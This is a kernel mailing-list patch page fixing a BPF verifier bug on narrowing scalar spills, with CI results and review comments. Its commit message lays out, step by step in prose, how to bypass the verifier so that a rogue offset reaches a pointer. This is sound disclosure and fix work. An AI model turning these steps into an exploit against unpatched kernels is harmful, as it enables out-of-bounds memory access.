diff mbox series

[bpf,v3,1/2] bpf: Fix verifier tracking scalars on spill

Message ID 20230606214246.403579-2-maxtram95@gmail.com (mailing list archive)
State Changes Requested
Delegated to: BPF
Headers show
Series Fix BPF verifier bypass on scalar spill | expand

Checks

Context Check Description
bpf/vmtest-bpf-VM_Test-1 success Logs for ShellCheck
bpf/vmtest-bpf-VM_Test-6 success Logs for set-matrix
bpf/vmtest-bpf-VM_Test-2 success Logs for build for aarch64 with gcc
bpf/vmtest-bpf-VM_Test-4 success Logs for build for x86_64 with gcc
bpf/vmtest-bpf-VM_Test-5 success Logs for build for x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-3 success Logs for build for s390x with gcc
bpf/vmtest-bpf-VM_Test-20 success Logs for test_progs_no_alu32_parallel on x86_64 with gcc
bpf/vmtest-bpf-VM_Test-22 success Logs for test_progs_parallel on aarch64 with gcc
bpf/vmtest-bpf-VM_Test-25 success Logs for test_verifier on aarch64 with gcc
bpf/vmtest-bpf-VM_Test-26 success Logs for test_verifier on s390x with gcc
bpf/vmtest-bpf-VM_Test-27 success Logs for test_verifier on x86_64 with gcc
bpf/vmtest-bpf-VM_Test-28 success Logs for test_verifier on x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-29 success Logs for veristat
bpf/vmtest-bpf-VM_Test-7 success Logs for test_maps on aarch64 with gcc
bpf/vmtest-bpf-VM_Test-9 success Logs for test_maps on x86_64 with gcc
bpf/vmtest-bpf-VM_Test-10 success Logs for test_maps on x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-11 success Logs for test_progs on aarch64 with gcc
bpf/vmtest-bpf-VM_Test-13 success Logs for test_progs on x86_64 with gcc
bpf/vmtest-bpf-VM_Test-14 success Logs for test_progs on x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-15 success Logs for test_progs_no_alu32 on aarch64 with gcc
bpf/vmtest-bpf-VM_Test-17 success Logs for test_progs_no_alu32 on x86_64 with gcc
bpf/vmtest-bpf-VM_Test-18 success Logs for test_progs_no_alu32 on x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-19 success Logs for test_progs_no_alu32_parallel on aarch64 with gcc
bpf/vmtest-bpf-VM_Test-21 success Logs for test_progs_no_alu32_parallel on x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-23 success Logs for test_progs_parallel on x86_64 with gcc
bpf/vmtest-bpf-VM_Test-24 success Logs for test_progs_parallel on x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-12 success Logs for test_progs on s390x with gcc
bpf/vmtest-bpf-VM_Test-16 success Logs for test_progs_no_alu32 on s390x with gcc
netdev/series_format success Posting correctly formatted
netdev/tree_selection success Clearly marked for bpf
netdev/fixes_present success Fixes tag present in non-next series
netdev/header_inline success No static functions without inline keyword in header files
netdev/build_32bit success Errors and warnings before: 20 this patch: 20
netdev/cc_maintainers success CCed 12 of 12 maintainers
netdev/build_clang success Errors and warnings before: 8 this patch: 8
netdev/verify_signedoff success Signed-off-by tag matches author and committer
netdev/deprecated_api success None detected
netdev/check_selftest success No net selftest shell script
netdev/verify_fixes success Fixes tag looks correct
netdev/build_allmodconfig_warn success Errors and warnings before: 20 this patch: 20
netdev/checkpatch success total: 0 errors, 0 warnings, 0 checks, 20 lines checked
netdev/kdoc success Errors and warnings before: 0 this patch: 0
netdev/source_inline success Was 0 now: 0
bpf/vmtest-bpf-PR success PR summary
bpf/vmtest-bpf-VM_Test-8 success Logs for test_maps on s390x with gcc

Commit Message

Maxim Mikityanskiy June 6, 2023, 9:42 p.m. UTC
From: Maxim Mikityanskiy <maxim@isovalent.com>

The following scenario describes a verifier bypass in privileged mode
(CAP_BPF or CAP_SYS_ADMIN):

1. Prepare a 32-bit rogue number.
2. Put the rogue number into the upper half of a 64-bit register, and
   roll a random (unknown to the verifier) bit in the lower half. The
   rest of the bits should be zero (although variations are possible).
3. Assign an ID to the register by MOVing it to another arbitrary
   register.
4. Perform a 32-bit spill of the register, then perform a 32-bit fill to
   another register. Due to a bug in the verifier, the ID will be
   preserved, although the new register will contain only the lower 32
   bits, i.e. all zeros except one random bit.

At this point there are two registers with different values but the same
ID, which means the integrity of the verifier state has been corrupted.
Next steps show the actual bypass:

5. Compare the new 32-bit register with 0. In the branch where it's
   equal to 0, the verifier will believe that the original 64-bit
   register is also 0, because it has the same ID, but its actual value
   still contains the rogue number in the upper half.
   Some optimizations of the verifier prevent the actual bypass, so
   extra care is needed: the comparison must be between two registers,
   and both branches must be reachable (this is why one random bit is
   needed). Both branches are still suitable for the bypass.
6. Right shift the original register by 32 bits to pop the rogue number.
7. Use the rogue number as an offset with any pointer. The verifier will
   believe that the offset is 0, while in reality it's the given number.

The fix is similar to the 32-bit BPF_MOV handling in check_alu_op for
SCALAR_VALUE. If the spill is narrowing the actual register value, don't
keep the ID, make sure it's reset to 0.

Fixes: 354e8f1970f8 ("bpf: Support <8-byte scalar spill and refill")
Signed-off-by: Maxim Mikityanskiy <maxim@isovalent.com>
---
 kernel/bpf/verifier.c | 7 +++++++
 1 file changed, 7 insertions(+)

Comments

Yonghong Song June 7, 2023, 1:32 a.m. UTC | #1
On 6/6/23 2:42 PM, Maxim Mikityanskiy wrote:
> From: Maxim Mikityanskiy <maxim@isovalent.com>
> 
> The following scenario describes a verifier bypass in privileged mode
> (CAP_BPF or CAP_SYS_ADMIN):
> 
> 1. Prepare a 32-bit rogue number.
> 2. Put the rogue number into the upper half of a 64-bit register, and
>     roll a random (unknown to the verifier) bit in the lower half. The
>     rest of the bits should be zero (although variations are possible).
> 3. Assign an ID to the register by MOVing it to another arbitrary
>     register.
> 4. Perform a 32-bit spill of the register, then perform a 32-bit fill to
>     another register. Due to a bug in the verifier, the ID will be
>     preserved, although the new register will contain only the lower 32
>     bits, i.e. all zeros except one random bit.
> 
> At this point there are two registers with different values but the same
> ID, which means the integrity of the verifier state has been corrupted.
> Next steps show the actual bypass:
> 
> 5. Compare the new 32-bit register with 0. In the branch where it's
>     equal to 0, the verifier will believe that the original 64-bit
>     register is also 0, because it has the same ID, but its actual value
>     still contains the rogue number in the upper half.
>     Some optimizations of the verifier prevent the actual bypass, so
>     extra care is needed: the comparison must be between two registers,
>     and both branches must be reachable (this is why one random bit is
>     needed). Both branches are still suitable for the bypass.
> 6. Right shift the original register by 32 bits to pop the rogue number.
> 7. Use the rogue number as an offset with any pointer. The verifier will
>     believe that the offset is 0, while in reality it's the given number.
> 
> The fix is similar to the 32-bit BPF_MOV handling in check_alu_op for
> SCALAR_VALUE. If the spill is narrowing the actual register value, don't
> keep the ID, make sure it's reset to 0.
> 
> Fixes: 354e8f1970f8 ("bpf: Support <8-byte scalar spill and refill")
> Signed-off-by: Maxim Mikityanskiy <maxim@isovalent.com>

LGTM with a small nit below.

Acked-by: Yonghong Song <yhs@fb.com>

> ---
>   kernel/bpf/verifier.c | 7 +++++++
>   1 file changed, 7 insertions(+)
> 
> diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> index 5871aa78d01a..7be23eced561 100644
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
> @@ -3856,6 +3856,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
>   	mark_stack_slot_scratched(env, spi);
>   	if (reg && !(off % BPF_REG_SIZE) && register_is_bounded(reg) &&
>   	    !register_is_null(reg) && env->bpf_capable) {
> +		bool reg_value_fits;
> +
>   		if (dst_reg != BPF_REG_FP) {
>   			/* The backtracking logic can only recognize explicit
>   			 * stack slot address like [fp - 8]. Other spill of
> @@ -3867,7 +3869,12 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
>   			if (err)
>   				return err;
>   		}
> +
> +		reg_value_fits = fls64(reg->umax_value) <= BITS_PER_BYTE * size;
>   		save_register_state(state, spi, reg, size);
> +		/* Break the relation on a narrowing spill. */
> +		if (!reg_value_fits)
> +			state->stack[spi].spilled_ptr.id = 0;

I think the code can be simplied like below:

--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -4230,6 +4230,8 @@ static int check_stack_write_fixed_off(struct 
bpf_verifier_env *env,
                                 return err;
                 }
                 save_register_state(state, spi, reg, size);
+               if (fls64(reg->umax_value) > BITS_PER_BYTE * size)
+                       state->stack[spi].spilled_ptr.id = 0;
         } else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
                    insn->imm != 0 && env->bpf_capable) {
                 struct bpf_reg_state fake_reg = {};

>   	} else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
>   		   insn->imm != 0 && env->bpf_capable) {
>   		struct bpf_reg_state fake_reg = {};
Maxim Mikityanskiy June 7, 2023, 7:36 a.m. UTC | #2
On Tue, 06 Jun 2023 at 18:32:37 -0700, Yonghong Song wrote:
> 
> 
> On 6/6/23 2:42 PM, Maxim Mikityanskiy wrote:
> > From: Maxim Mikityanskiy <maxim@isovalent.com>
> > 
> > The following scenario describes a verifier bypass in privileged mode
> > (CAP_BPF or CAP_SYS_ADMIN):
> > 
> > 1. Prepare a 32-bit rogue number.
> > 2. Put the rogue number into the upper half of a 64-bit register, and
> >     roll a random (unknown to the verifier) bit in the lower half. The
> >     rest of the bits should be zero (although variations are possible).
> > 3. Assign an ID to the register by MOVing it to another arbitrary
> >     register.
> > 4. Perform a 32-bit spill of the register, then perform a 32-bit fill to
> >     another register. Due to a bug in the verifier, the ID will be
> >     preserved, although the new register will contain only the lower 32
> >     bits, i.e. all zeros except one random bit.
> > 
> > At this point there are two registers with different values but the same
> > ID, which means the integrity of the verifier state has been corrupted.
> > Next steps show the actual bypass:
> > 
> > 5. Compare the new 32-bit register with 0. In the branch where it's
> >     equal to 0, the verifier will believe that the original 64-bit
> >     register is also 0, because it has the same ID, but its actual value
> >     still contains the rogue number in the upper half.
> >     Some optimizations of the verifier prevent the actual bypass, so
> >     extra care is needed: the comparison must be between two registers,
> >     and both branches must be reachable (this is why one random bit is
> >     needed). Both branches are still suitable for the bypass.
> > 6. Right shift the original register by 32 bits to pop the rogue number.
> > 7. Use the rogue number as an offset with any pointer. The verifier will
> >     believe that the offset is 0, while in reality it's the given number.
> > 
> > The fix is similar to the 32-bit BPF_MOV handling in check_alu_op for
> > SCALAR_VALUE. If the spill is narrowing the actual register value, don't
> > keep the ID, make sure it's reset to 0.
> > 
> > Fixes: 354e8f1970f8 ("bpf: Support <8-byte scalar spill and refill")
> > Signed-off-by: Maxim Mikityanskiy <maxim@isovalent.com>
> 
> LGTM with a small nit below.
> 
> Acked-by: Yonghong Song <yhs@fb.com>
> 
> > ---
> >   kernel/bpf/verifier.c | 7 +++++++
> >   1 file changed, 7 insertions(+)
> > 
> > diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> > index 5871aa78d01a..7be23eced561 100644
> > --- a/kernel/bpf/verifier.c
> > +++ b/kernel/bpf/verifier.c
> > @@ -3856,6 +3856,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
> >   	mark_stack_slot_scratched(env, spi);
> >   	if (reg && !(off % BPF_REG_SIZE) && register_is_bounded(reg) &&
> >   	    !register_is_null(reg) && env->bpf_capable) {
> > +		bool reg_value_fits;
> > +
> >   		if (dst_reg != BPF_REG_FP) {
> >   			/* The backtracking logic can only recognize explicit
> >   			 * stack slot address like [fp - 8]. Other spill of
> > @@ -3867,7 +3869,12 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
> >   			if (err)
> >   				return err;
> >   		}
> > +
> > +		reg_value_fits = fls64(reg->umax_value) <= BITS_PER_BYTE * size;
> >   		save_register_state(state, spi, reg, size);
> > +		/* Break the relation on a narrowing spill. */
> > +		if (!reg_value_fits)
> > +			state->stack[spi].spilled_ptr.id = 0;
> 
> I think the code can be simplied like below:
> 
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
> @@ -4230,6 +4230,8 @@ static int check_stack_write_fixed_off(struct
> bpf_verifier_env *env,
>                                 return err;
>                 }
>                 save_register_state(state, spi, reg, size);
> +               if (fls64(reg->umax_value) > BITS_PER_BYTE * size)
> +                       state->stack[spi].spilled_ptr.id = 0;
>         } else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
>                    insn->imm != 0 && env->bpf_capable) {
>                 struct bpf_reg_state fake_reg = {};
> 

That's true, I kept the variable to avoid churn when I send a follow-up
improvement:

+               /* Make sure that reg had an ID to build a relation on spill. */
+               if (reg_value_fits && !reg->id)
+                       reg->id = ++env->id_gen;
                save_register_state(state, spi, reg, size);

But yeah, I agree, let's simplify it for now, there is no guarantee that
the follow-up patch will be accepted as is. Thanks for the review!

> >   	} else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
> >   		   insn->imm != 0 && env->bpf_capable) {
> >   		struct bpf_reg_state fake_reg = {};
diff mbox series

Patch

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 5871aa78d01a..7be23eced561 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -3856,6 +3856,8 @@  static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
 	mark_stack_slot_scratched(env, spi);
 	if (reg && !(off % BPF_REG_SIZE) && register_is_bounded(reg) &&
 	    !register_is_null(reg) && env->bpf_capable) {
+		bool reg_value_fits;
+
 		if (dst_reg != BPF_REG_FP) {
 			/* The backtracking logic can only recognize explicit
 			 * stack slot address like [fp - 8]. Other spill of
@@ -3867,7 +3869,12 @@  static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
 			if (err)
 				return err;
 		}
+
+		reg_value_fits = fls64(reg->umax_value) <= BITS_PER_BYTE * size;
 		save_register_state(state, spi, reg, size);
+		/* Break the relation on a narrowing spill. */
+		if (!reg_value_fits)
+			state->stack[spi].spilled_ptr.id = 0;
 	} else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
 		   insn->imm != 0 && env->bpf_capable) {
 		struct bpf_reg_state fake_reg = {};